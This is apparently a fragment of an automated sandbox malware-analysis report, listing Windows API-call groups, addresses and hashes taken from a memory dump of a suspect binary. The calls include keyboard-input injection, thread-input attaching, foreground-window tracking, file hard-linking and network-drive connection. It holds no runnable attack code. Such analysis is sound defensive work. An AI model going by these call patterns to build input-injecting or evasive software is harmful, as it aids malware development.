• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C661C8
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00C661EE
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C66213
                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C6623F
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C5B473
                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 00C5B48F
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C5B4FD
                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C5B54F
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00C5B5B8
                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C5B5D4
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C5B63B
                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00C5B68D
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00C880D4
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C8814A
                                                                                                                                                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 00C8815A
                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00C881C6
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00C82187
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C543AD
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: GetCurrentThreadId.KERNEL32 ref: 00C543B4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C52F00), ref: 00C543BB
                                                                                                                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 00C8219B
                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00C821E8
                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00C821EE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF41EA: _wcslen.LIBCMT ref: 00BF41EF
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5E8E2
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5E8F9
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5E924
                                                                                                                                                                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00C5E92F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C89A5D
                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C89A72
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C89ABA
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00C89AF0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,00C8DC30), ref: 00C5DBA6
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C5DBB5
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C5DBC4
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C8DC30), ref: 00C5DC21
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0ddb87758f1caee7f9917cec7cfd0be048a358864de3cf22e158d948d2dddf4d
                                                                                                                                                                                                                                                                            • Instruction ID: bb5723a757865dc45faa25c88b0ebd7eba2d27b8b47b494483e3bfc9876cadef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ddb87758f1caee7f9917cec7cfd0be048a358864de3cf22e158d948d2dddf4d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 472182741043059F8324EF24C84096AB7E8AE55365F100A59F8AAC72A1D730DE8ACB46
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00C832A6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C832C0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C832CE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C832DC
APIs
  • Part of subcall function 00C596E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C58271,?,000000FF,?,00C590BB,00000000,?,0000001C,?,?), ref: 00C596F3
  • Part of subcall function 00C596E4: lstrcpyW.KERNEL32(00000000,?,?,00C58271,?,000000FF,?,00C590BB,00000000,?,0000001C,?,?,00000000), ref: 00C59719
  • Part of subcall function 00C596E4: lstrcmpiW.KERNEL32(00000000,?,00C58271,?,000000FF,?,00C590BB,00000000,?,0000001C,?,?), ref: 00C5974A
• lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C590BB,00000000,?,0000001C,?,?,00000000), ref: 00C5828A
• lstrcpyW.KERNEL32(00000000,?,?,00C590BB,00000000,?,0000001C,?,?,00000000), ref: 00C582B0
• lstrcmpiW.KERNEL32(00000002,cdecl,?,00C590BB,00000000,?,0000001C,?,?,00000000), ref: 00C582EB
APIs
• SendMessageW.USER32(?,00001060,?,00000004), ref: 00C8615A
• _wcslen.LIBCMT ref: 00C8616C
• _wcslen.LIBCMT ref: 00C86177
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00C862B5
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00C52394
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C523A6
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C523BC
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C523D7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00BF1AF4
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C331F9
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C33203
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C3320E
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C5EB14
                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00C5EB47
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C5EB5D
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C5EB64
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,?,00C1D369,00000000,00000004,00000000), ref: 00C1D588
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C1D594
                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C1D59B
                                                                                                                                                                                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00C1D5B9
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 173952441-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BF78B1
                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00BF78C5
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF78CF
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                            • Opcode ID: a944988429960973d9b2d6045f9b29708cfdd9a7dc16a2fb09b0f0e702803d76
                                                                                                                                                                                                                                                                            • Instruction ID: a0601cbe5f5b4f673b1f1e6383456291a5ae0aa795da882de1cf60479ab7835e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a944988429960973d9b2d6045f9b29708cfdd9a7dc16a2fb09b0f0e702803d76
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD117972505548BFEB025F919C58FEA7BA9FF083A4F040195FA0252160DB319C60EBA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00C2338D,00000364,00000000,00000000,00000000,?,00C235FE,00000006,FlsSetValue), ref: 00C23418
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00C2338D,00000364,00000000,00000000,00000000,?,00C235FE,00000006,FlsSetValue,00C93260,FlsSetValue,00000000,00000364,?,00C231B9), ref: 00C23424
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C2338D,00000364,00000000,00000000,00000000,?,00C235FE,00000006,FlsSetValue,00C93260,FlsSetValue,00000000), ref: 00C23432
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5a4e31efe6d3739f55f6b59f41d31b317c34b5bcdc24f2935c3beefe917e6f4b
                                                                                                                                                                                                                                                                            • Instruction ID: c9037236ac18c2c23e4d75f6ef7ff62bd090140f8e7eedf8479b6e3ce19d96f9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a4e31efe6d3739f55f6b59f41d31b317c34b5bcdc24f2935c3beefe917e6f4b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F501F732611272ABCB229B79BC44F5A3F58BF15B717200660FA16D7580C728DF01C7E4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C5B69A,?,00008000), ref: 00C5BA8B
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C5B69A,?,00008000), ref: 00C5BAB0
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C5B69A,?,00008000), ref: 00C5BABA
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C5B69A,?,00008000), ref: 00C5BAED
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                            • Opcode ID: a395d378a1fef8ee121ae307afa6cd13a5f504d2a1872e1bcfade789457f4bfd
                                                                                                                                                                                                                                                                            • Instruction ID: 41d784c391374ecb301df89ef9af9772edd4f8e2e2b2c2d290feb88a197c6332
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a395d378a1fef8ee121ae307afa6cd13a5f504d2a1872e1bcfade789457f4bfd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9115E35C00619E7CF00EFA5E9497EEBF78FF09712F104095E941B2190DB305A94DB69
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C8888E
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C888A6
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C888CA
                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C888E5
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1680cd8ea7eff47de4f94d722fcbd2a3b1824a942275231ae76794b5fd33e5db
                                                                                                                                                                                                                                                                            • Instruction ID: 07aa39311ff3bd2513ef5296befed51ad8f00aa2fa5f4f4e1e78ebb1f00007c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1680cd8ea7eff47de4f94d722fcbd2a3b1824a942275231ae76794b5fd33e5db
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 501140B9D0020DAFDB41DFA8C884AEEBBB5FB08314F508166E925E2650E735AA54CF54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C53712
                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C53723
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C5372A
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C53731
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2710830443-0
APIs
  • Part of subcall function 00BF1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF1F87
  • Part of subcall function 00BF1F2D: SelectObject.GDI32(?,00000000), ref: 00BF1F96
  • Part of subcall function 00BF1F2D: BeginPath.GDI32(?), ref: 00BF1FAD
  • Part of subcall function 00BF1F2D: SelectObject.GDI32(?,00000000), ref: 00BF1FD6
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C892E3
• LineTo.GDI32(?,?,?), ref: 00C892F0
• EndPath.GDI32(?), ref: 00C89300
• StrokePath.GDI32(?), ref: 00C8930E
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Similarity
• API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
• String ID:
• API String ID: 1539411459-0
APIs
• GetSysColor.USER32(00000008), ref: 00BF21BC
• SetTextColor.GDI32(?,?), ref: 00BF21C6
• SetBkMode.GDI32(?,00000001), ref: 00BF21D9
• GetStockObject.GDI32(00000005), ref: 00BF21E1
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Similarity
• API ID: Color$ModeObjectStockText
• String ID:
• API String ID: 4037423528-0
APIs
• GetDesktopWindow.USER32 ref: 00C4EC36
• GetDC.USER32(00000000), ref: 00C4EC40
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C4EC60
• ReleaseDC.USER32(?), ref: 00C4EC81
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
• GetDesktopWindow.USER32 ref: 00C4EC4A
• GetDC.USER32(00000000), ref: 00C4EC54
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C4EC60
• ReleaseDC.USER32(?), ref: 00C4EC81
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF41EA: _wcslen.LIBCMT ref: 00BF41EF
                                                                                                                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C65919
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                            • String ID: *$LPT
                                                                                                                                                                                                                                                                            • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                            • Opcode ID: 9e088f6ee9b6a8272a8a3ad8c0e24b700badfbe1882d02926fe52ea651d3ae38
                                                                                                                                                                                                                                                                            • Instruction ID: 3eb5c4cabbdb06aad6ef6565f0923a8149b957c9e3aee7cc327bfc990015c5a2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e088f6ee9b6a8272a8a3ad8c0e24b700badfbe1882d02926fe52ea651d3ae38
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36916F75A00604DFCB24DF54C4D4EAABBF1AF45314F288099E8559F3A2C771EE86DB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00C1E67D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                            • String ID: pow
                                                                                                                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                            • Opcode ID: fd2cbf4eb2e15b03f759d9f95835d1d871f4ef8a4234d3fc23e52538b5dfbaab
                                                                                                                                                                                                                                                                            • Instruction ID: b6f0d83d26957c53e3b2dd428e8b0d2cab1bd69b4681ed324bc26dbceb070577
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd2cbf4eb2e15b03f759d9f95835d1d871f4ef8a4234d3fc23e52538b5dfbaab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A51CF71E0A106D6D7117714ED013EE3BA0AB51700F704D59F8B1C26E8DF358EEABA86
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: #
                                                                                                                                                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                            • Opcode ID: 668d695f2df60d46a13d618b54ae4665ec988c5361e279c8f43dc188ea445ca3
                                                                                                                                                                                                                                                                            • Instruction ID: c37fd1f5f451340876dbef52f1593848f47dd1673104fc1862156d93d3b5956a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 668d695f2df60d46a13d618b54ae4665ec988c5361e279c8f43dc188ea445ca3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39512031A0434ADFDF25DF28C451ABE7BA4BF15310F644059F9A19B2D0DB349E8ACB61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00C0F6DB
                                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C0F6F4
